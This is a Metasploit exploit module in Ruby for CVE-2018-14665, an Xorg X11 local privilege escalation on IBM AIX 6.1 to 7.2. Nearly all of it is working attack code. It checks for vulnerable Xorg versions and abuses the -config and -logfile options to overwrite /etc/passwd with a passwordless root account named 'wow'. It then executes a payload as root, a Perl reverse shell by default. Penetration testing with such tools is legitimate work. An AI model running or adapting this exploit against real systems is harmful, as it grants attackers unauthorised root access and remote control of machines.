## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::File include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Xorg X11 Server Local Privilege Escalation', 'Description' => %q( WARNING: Successful execution of this module results in /etc/passwd being overwritten. This module is a port of the OpenBSD X11 Xorg exploit to run on AIX. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1. Due to permission restrictions of the crontab in AIX, this module does not use cron, and instead overwrites /etc/passwd in order to create a new user with root privileges. All currently logged in users need to be included when /etc/passwd is overwritten, else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user. The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX, and is replaced by '-config', in conjuction with ANSI-C quotes to inject newlines when overwriting /etc/passwd. ), 'Author' => [ 'Narendra Shinde', # Discovery and original FreeBSD exploit 'Zack Flack ' # Metasploit module and original AIX exploit ], 'License' => MSF_LICENSE, 'DisclosureDate' => 'Oct 25 2018', 'Notes' => { 'SideEffects' => [ CONFIG_CHANGES ] }, 'References' => [ ['CVE', '2018-14665'], ['URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html'], ['URL', 'https://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc'], ['URL', 'https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl'], ['EDB', '45938'] ], 'Platform' => ['unix'], 'Arch' => [ARCH_CMD], 'SessionTypes' => ['shell'], 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'perl' } }, 'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_perl' }, 'Targets' => [ ['IBM AIX Version 6.1', {}], ['IBM AIX Version 7.1', {}], ['IBM AIX Version 7.2', {}] ], 'DefaultTarget' => 1)) register_options( [ OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) ] ) end def check xorg_path = cmd_exec('command -v Xorg') if !xorg_path.include?('Xorg') print_error('Could not find Xorg executable') return Exploit::CheckCode::Safe end ksh93_path = cmd_exec('command -v ksh93') if !ksh93_path.include?('ksh') print_error('Could not find Ksh93 executable') return Exploit::CheckCode::Safe end if !xorg_vulnerable? print_error('Xorg version is not vulnerable') return Exploit::CheckCode::Safe end return Exploit::CheckCode::Appears end def exploit status = check if status == Exploit::CheckCode::Safe fail_with(Failure::NotVulnerable, '') end if !writable?(datastore['WritableDir']) fail_with(Failure::BadConfig, "#{datastore['WritableDir']} is not writable") end xorg_path = cmd_exec('command -v Xorg') ksh93_path = cmd_exec('command -v ksh93') xorg_payload = generate_xorg_payload(xorg_path, ksh93_path, datastore['WritableDir']) xorg_script_path = "#{datastore['WritableDir']}/wow.ksh" upload_and_chmodx(xorg_script_path, xorg_payload) passwd_backup = "#{datastore['WritableDir']}/passwd.backup" print_status("Backing up /etc/passwd to #{passwd_backup}") cmd_exec("cp /etc/passwd #{passwd_backup}") register_file_for_cleanup(passwd_backup) print_status("Executing #{xorg_script_path}") cmd_exec(xorg_script_path) print_status('Checking if we are root') if root? shell_payload = %(#!#{ksh93_path} #{payload.encoded} ) shell_script_path = "#{datastore['WritableDir']}/wowee.ksh" upload_and_chmodx(shell_script_path, shell_payload) print_status('Executing shell payload') cmd_exec("#{ksh93_path} -c \"echo #{shell_script_path} | su - wow &\"") print_status('Restoring original /etc/passwd') cmd_exec("su - wow -c \"cp #{passwd_backup} /etc/passwd\"") else fail_with(Failure::PayloadFailed, '') end end def generate_xorg_payload(xorg_path, ksh93_path, writabledir) passwd_file = read_file('/etc/passwd') passwd_array = passwd_file.split("\n") print_status('Retrieving currently logged in users') users = cmd_exec('who | cut -d\' \' -f1 | sort | uniq') users << "\n" users_array = users.split("\n") logged_in_users = '' if !users_array.empty? users_array.each do |user| user << ':' passwd_array.each do |line| if line.index(user) == 0 logged_in_users << '\n' logged_in_users << line end end end end passwd_data = "$'#{logged_in_users}\\nwow::0:0::/:/usr/bin/ksh\\n#'" subdir_count = writabledir.count('/') relative_passwd = '../' * subdir_count + '../../etc/passwd' return %(#!#{ksh93_path} #{xorg_path} -config #{passwd_data} -logfile #{relative_passwd} :1 > /dev/null 2>&1 ) end def xorg_vulnerable? version = cmd_exec('lslpp -L | grep -i X11.base.rte | awk \'{ print $2 }\'') print_status("Xorg version is #{version}") semantic_version = Gem::Version.new(version) vulnerable_versions = [ ['6.1.9.0', '6.1.9.100'], ['7.1.4.0', '7.1.4.30'], ['7.1.5.0', '7.1.5.31'], ['7.2.0.0', '7.2.0.1'], ['7.2.1.0', '7.2.1.0'], ['7.2.2.0', '7.2.2.0'], ['7.2.3.0', '7.2.3.15'] ] vulnerable_versions.each do |version_pair| if semantic_version >= Gem::Version.new(version_pair[0]) && semantic_version <= Gem::Version.new(version_pair[1]) return true end end return false end def root? id_output = cmd_exec('su - wow -c "id"') if id_output.include?('euid=0') || id_output.include?('uid=0') print_good('Got root!') return true end print_error('Not root') false end def upload_and_chmodx(path, data) print_status("Writing to #{path}") rm_f(path) write_file(path, data) cmd_exec("chmod 0555 '#{path}'") register_file_for_cleanup(path) end end